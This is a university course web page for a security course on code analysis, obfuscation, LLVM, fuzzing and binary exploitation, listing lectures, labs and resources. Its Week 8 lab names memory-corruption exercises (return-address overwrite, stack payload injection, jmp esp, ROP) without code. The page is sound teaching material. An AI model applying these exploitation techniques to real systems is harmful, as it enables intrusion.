Code: analysis, bugs, and security

optional course, supported by Bitdefender

Instructor: Marius Minea, marius@cs.upt.ro (Office: B531. Phone: +40-256-403284)
Lab assistant: Andrei Ardelean, gmail: andreirardelean
Course: Wed 8-10, ASPC
Lab: Thu 16-18, B528; Fri 12-14, B418

New: contest with special prizes for students participating in the course

Course materials

Introduction.
Sample program: print addresses
Assembly language.
Sample programs: nested expression (and in three-address code), switch, array of function pointers, lists with pointers to pointers
See also: x86 Assembly Guide (David Evans, U. Virginia)
Robust and secure programming in C
See also: CERT C Coding Standard
Compiler basics. Native code and bytecode.
Linking and loading.
A very good summary (D. Beazley et al.)
U. Drepper. How to write shared libraries -- a very detailed description.
Obfuscation (summary). Extensive slideset (Christian Collberg, U. Arizona)
Extra: a recent deobfuscation paper (IEEE S&P 2015) -- see general discussion and obfuscated graphs.
Analysis with LLVM. Intro and LLVM Passes (F. Pereira, UFMG), also tutorial from 2015 LLVM Dev meeting
Obfuscate add pass + CMakeFile (adapted from tutorial above).
Writing an LLVM pass and LLVM Programmer's Manual

Laboratory

Week 2: structure of a Unix executable (ELF)
For the lab: practice writing programs which follow file structure, e.g. ZIP file, bitmap, etc.
Lab summary: parseElf.c: inspect the file processing code and error checks, and try to find a missing check with very bad consequences.
Week 3: write an unzip program, and check it against some test archives (with some problems)
archive with all zip files. File zipinfo.txt describes each zip.
Week 4: Examine and modify assembly produced by the compiler.
Week 5: Running in a debugger. GDB command summary
The programs with function hooking and mprotect done in the lab (updated also for 64 bits, try yourself first).
Some more explanations about resolution of library functions with different compilers.
Week 6. Obfuscation. First and second binary to work on.
The Tigress virtualizer/obfuscator
Week 7. Writing an LLVM pass. obfuscate add , count memory writes.
Week 8. Memory corruption vulnerabilities. test program.
- overwrite the return address with that of go_shell
- insert your own payload on the stack
- same as above, but with randomized stack (search for jmp esp
- with non-executable stack enabled, do a ROP attack
Week 9. Writing a clang checker. Tutorial. archive and code written in lab
Week 11. Fuzzing and symbolic execution.
American Fuzzy Lop
Tool to interpret KLEE results

Resources

Other courses

System Security and Binary Analysis (UT Dallas). Graduate course, good source of topics
Malware Analysis (Rensselaer). Very good set of labs
Modern Binary Exploitation (Rensselaer)
Software Protection: How to Crack Programs, and Defend Against Cracking (Christian Collberg)
Computer and Network Security (Politehnica University of Bucharest)

Marius Minea

Last modified: Thu Nov 10 14:15:00 EET 2016